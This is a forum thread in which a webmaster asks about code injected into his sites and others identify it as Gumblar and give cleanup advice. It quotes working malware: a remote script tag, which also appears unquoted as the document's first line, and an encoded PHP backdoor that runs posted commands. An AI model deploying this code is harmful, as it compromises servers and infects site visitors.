<script src=http://kayserwesner.com/README_FILES/mainbody.php >

[Warren Smith]

Hi Folks,

It appears I have some type of virus or something that's changing the code
in my websites on my virtual server account. After the head tags the
following code appears

</head><script src=http://kayserwesner.com/README_FILES/mainbody.php

</script>

<body>

Also at the top of the html code I get the following crap. Any ideas. TIA

<?php
eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygncDJobCcpKXtmdW5jdGlvbiBwMmhsKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYocHJlZ19tYXRjaCgnI1tcLiBdd2lkdGhccyo9XHMqW1wnIl0/MCpbMC05XVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDJ0aGVYTmxjbmRsYzI1bGNpNWpiMjB2VWtWQlJFMUZYMFpKVEVWVEwyMWhhVzVpYjJSNUxuQm9jQ0ErUEM5elkzSnBjSFErJyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcywxKTtlbHNlaWYoc3RycG9zKCRzLCc8YScpKSRzPSRhLiRzO3JldHVybiRzO31mdW5jdGlvbiBwMmhsMigkYSwkYiwkYywkZCl7Z2xvYmFsJHAyaGwxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRwMmhsMSkpY2FsbF91c2VyX2Z1bmMoJHAyaGwxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdwMmhsJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgncDJobCcpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRwMmhsbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcigncDJobDInKSkhPSdwMmhsMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7'));
?>

 

[VanguardLH]

It appears I have some type of virus or something that's changing the code
in my websites on my virtual server account.

You expected someone here to be the admin for your webhosting service?

Google still works to find a Base64 decoder to show you what the code
section contains:

http://www.google.com/search?q=base64+decode

 

[David H. Lipman]

From: "Warren Smith" <[email protected]>

| Hi Folks,

| It appears I have some type of virus or something that's changing the code
| in my websites on my virtual server account. After the head tags the
| following code appears


| <body>

| Also at the top of the html code I get the following crap. Any ideas. TIA

< snip >

Looks like Gumblar in action.

http://en.wikipedia.org/wiki/Gumblar

http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/

The site needs to be taken down.

All code pages need to be cleaned.

All passwords should be changed.

All vulnerabilities *must* be miitigated.

 

[John Mason Jr]

From: "Warren Smith"<[email protected]>

| Hi Folks,

| It appears I have some type of virus or something that's changing the code
| in my websites on my virtual server account. After the head tags the
| following code appears



|<body>

| Also at the top of the html code I get the following crap. Any ideas. TIA

< snip>

Looks like Gumblar in action.

http://en.wikipedia.org/wiki/Gumblar

http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/

The site needs to be taken down.

All code pages need to be cleaned.

All passwords should be changed.

All vulnerabilities *must* be miitigated.

Might want to also create a google webmaster account, and verify
ownership/control (google reports site as malicious)

Also you can find more help at http://badwarebusters.org


John